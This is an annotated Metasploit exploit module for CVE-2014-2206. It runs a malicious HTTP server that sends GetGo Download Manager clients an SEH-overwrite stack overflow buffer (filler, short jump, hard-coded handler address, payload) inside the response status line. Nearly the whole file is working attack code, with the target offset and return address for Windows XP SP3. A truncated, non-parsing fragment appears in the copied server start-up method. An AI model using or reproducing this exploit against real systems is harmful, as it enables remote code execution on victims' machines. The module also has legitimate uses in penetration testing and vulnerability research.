##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Malicious-server exploit for GetGo Download Manager (CVE-2014-2206).
#
# The module hosts an HTTP server and waits for the victim's download
# manager to fetch a lure URL (default /shakeitoff.mp3). The overflow is in
# the client's handling of the HTTP *response header*: the whole exploit
# buffer is delivered in the status line, with an empty body.
#
# Only a single target (Windows XP SP3) is defined, with a hard-coded
# handler address; expect the offsets and address to be specific to that
# build.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  # Seh is included, but the visible code builds the SEH record by hand in
  # on_request_uri rather than calling the mixin's helpers.
  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpServer

  # Module metadata: references, default lure path, payload constraints and
  # the single target's overflow offset / handler address.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GetGo Download Manager HTTP Response Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability in
        GetGo Download Manager version 4.9.0.1982 and earlier, caused by an
        overly long HTTP response header. By persuading the victim to
        download a file from a malicious server, a remote attacker could
        execute arbitrary code on the system or cause the application
        to crash. This module has been tested successfully on Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julien Ahrens', # Vulnerability discovery
          'Gabor Seljan'   # Metasploit module
        ],
      'References'     =>
        [
          [ 'EDB', '32132' ],
          [ 'OSVDB', '103910' ],
          [ 'CVE', '2014-2206' ],
        ],
      'DefaultOptions' =>
        {
          # The payload runs inside the download manager; 'process' ends
          # that process when the payload finishes.
          'ExitFunction' => 'process',
          # Lure filename the victim is expected to request.
          'URIPATH'      => "/shakeitoff.mp3"
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # The payload travels inside an HTTP header line: CR/LF would end
          # the line early, and NUL is excluded as well. Note that the
          # handler address below still contains a 0x00 as its last
          # little-endian byte; the author reports success on the listed
          # target, so the vulnerable copy is evidently not NUL-terminated,
          # but confirm that before reusing this layout on another build.
          'BadChars' => "\x00\x0a\x0d",
          'Space'    => 2000
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              # Bytes of filler before the overwritten exception record.
              'Offset' => 4107,
              # Fixed absolute address (no ASLR on XP); per the author's
              # annotation it is a CALL DWORD PTR SS:[EBP+30] gadget that
              # dispatches back into the overwritten record.
              'Ret'    => 0x00280b0b # CALL DWORD PTR SS:[EBP+30]
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 09 2014',
      'DefaultTarget'  => 0))
  end

  #
  # Handle the HTTP request and return a response.
  # Code borrowed from: msf/core/exploit/http/server.rb
  #
  # Local copy of the mixin's server start-up. The only visible difference
  # from the mixin is that the listening port is read from HTTPPORT; nothing
  # in this listing registers that option, so confirm it is registered
  # elsewhere (possibly in the part of the file lost from this paste) or
  # 'ServerPort' will be nil here.
  #
  def start_http(opts={})
    # Ensure all dependencies are present before initializing HTTP
    use_zlib

    # ListenerComm selects the transport the server binds through: "local"
    # means the framework's local socket comm, anything else leaves it to
    # the default (nil).
    comm = datastore['ListenerComm']
    if (comm.to_s == "local")
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    # Default the server host / port; caller-supplied opts win.
    opts = {
      'ServerHost' => datastore['SRVHOST'],
      'ServerPort' => datastore['HTTPPORT'],
      'Comm'       => comm
    }.update(opts)

    # Start a new HTTP server
    #
    # NOTE(review): the listing is truncated here. Everything between this
    # comment and the fragment below is missing from the page -- presumably
    # the service start, resource registration and keep-alive loop that end
    # this method, plus the start of a cleanup method whose tail
    # (`@http_service = nil` / `rescue` / `end`) is what survives. The
    # fragment does not parse as-is; restore start_http (and cleanup) from
    # the mixin named above rather than from this page.
    @http_service = nil
  rescue
  end
  end

  # Serve the exploit to a connecting client.
  #
  # Gating is by User-Agent only: a request whose User-Agent does not match
  # /GetGo Download Manager 4.0/ (unanchored) gets a 404; any client that
  # presents a matching string receives the full exploit buffer. A missing
  # User-Agent header also falls into the 404 branch.
  #
  # Buffer layout, all of it carried in the status line's message (the
  # second argument to create_response), with the body explicitly emptied:
  #   rand_text_alpha(Offset)   filler up to the exception record
  #   \x90\x90\xEB\x06          two NOPs then a 6-byte short jump, which
  #                             skips the 4-byte handler address that follows
  #   [target.ret].pack('V')    handler address, little-endian
  #   payload.encoded           the payload the jump lands in
  #
  # @param cli     connected client socket
  # @param request parsed HTTP request
  def on_request_uri(cli, request)
    print_status("Client connected...")

    unless request['User-Agent'] =~ /GetGo Download Manager 4.0/
      print_error("Sending 404 for unknown user-agent")
      send_not_found(cli)
      return
    end

    sploit = rand_text_alpha(target['Offset'])
    sploit << "\x90\x90\xEB\x06"
    sploit << [target.ret].pack('V')
    sploit << payload.encoded

    print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")

    # The overflow is in header parsing, so the buffer goes into the status
    # message rather than the body.
    resp = create_response(200, sploit)
    resp.body = ""
    cli.send_response(resp)
    close_client(cli)
  end
end